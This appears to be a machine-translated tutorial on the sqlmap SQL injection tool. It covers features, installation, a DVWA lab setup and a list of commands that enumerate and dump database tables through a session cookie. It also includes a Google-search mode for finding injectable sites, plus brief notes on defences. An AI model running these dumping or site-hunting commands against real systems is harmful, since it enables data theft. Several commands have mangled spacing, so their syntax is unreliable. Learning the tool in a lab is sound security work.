Sqlmap Learning Path-Automated test SQL injection Tool

SQLMAP Automated test SQL injection issues return version information, and so on.

Sqlmap is an open source, automated SQL injection tool written by Python, so running requires the Python environment to be installed.

For more sqlmap information you can visit the official http://sqlmap.org/,https://github.com/sqlmapproject/sqlmap,https://www.python.org.

Note: Sqlmap is only used to detect and exploit the SQL injection point, and does not scan the site for any vulnerabilities, use the Scan tool before using the SQL injection point.

Characteristics:

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, A variety of database management systems such as HSQLDB and Informix.
• Full support for Boolean blind, time-type blind, error-based injection, joint query injection, and heap query injection.
• Supports direct connection to a database without a SQL injection point, such as database certificates, IP addresses, ports, and database names, if such conditions permit.
• Supports enumeration of users, passwords, hashes, permissions, roles, databases, data tables, and columns.
• Supports automatic identification of password hashed format and decoding password hashes through a dictionary.
• Support for completely downloading a table in a database, or downloading only a few columns from a table, or even downloading only some of the data in a column, depends entirely on the user's choice.
• Support for searching the database management system for the specified database name, table name, or column name
• Support for downloading or uploading files when the database management system is MySQL, PostgreSQL, or Microsoft SQL Server.
• Support execution of arbitrary commands and return to standard output when the database management system is MySQL, PostgreSQL, or Microsoft SQL Server.

Installing Sqlmap

1. Download python and install it;

2. Download the sqlmap and install it; note put the sqlmap into the environment variable;

Sqlmap run requires Python version 2.6 or 2.7, version too high is not supported. Depressed ┭┮﹏┭┮

Simply make a note:

Sqlmap.py Direct operation

See this interface to show that the installation was successful! Since the installation of Python version is too high, can not run itself, for official website early data.

Prepare test Source: DVWA http://www.dvwa.co.uk/github Download Source code

Unzip to the WWW root directory

Configuring the Vhost Environment

Modify Config.inc.php.dist ==> config.inc.php under the DVWA config file

Modify IP Address database user password port number

Install DVWA,

CSRF XSS SQL injection

If Sqlmap is used;

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111" (URL path)

Sqlmap.py-r "Test.text" (file name)

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111"--dbs get the database name

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111"--tables get table name

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111"--dump dump data

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111"--dump--all dump data

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111" data= "Data stitching string"--dbs

Sqlmap.py-u "Http://www.lingbook.com?test=lingbook"--cookie= "phpsessid=11111111111111111" data= "Data stitching string"--dbs-- Batch--smart Auto-select Yes

Sqlmap.py-g "inurl:www.lingbook.com" Google search FQ

sqlmap.py--g "keywords"--batch--smart find injection points

Web firewall: Hardware firewall, software firewall

Determine if there is a malicious request

Ngx_lua.

White Hat code Audit: parameter filtering, SQL write-in

Get post header three-way injection

SELECT * from user where id=1 ' select * from user where id=1 ' throws exception statement

Exceptions that are thrown by special characters can cause SQL injection

Pre-compilation filtering

Sqlmap Learning Path-Automated test SQL injection Tool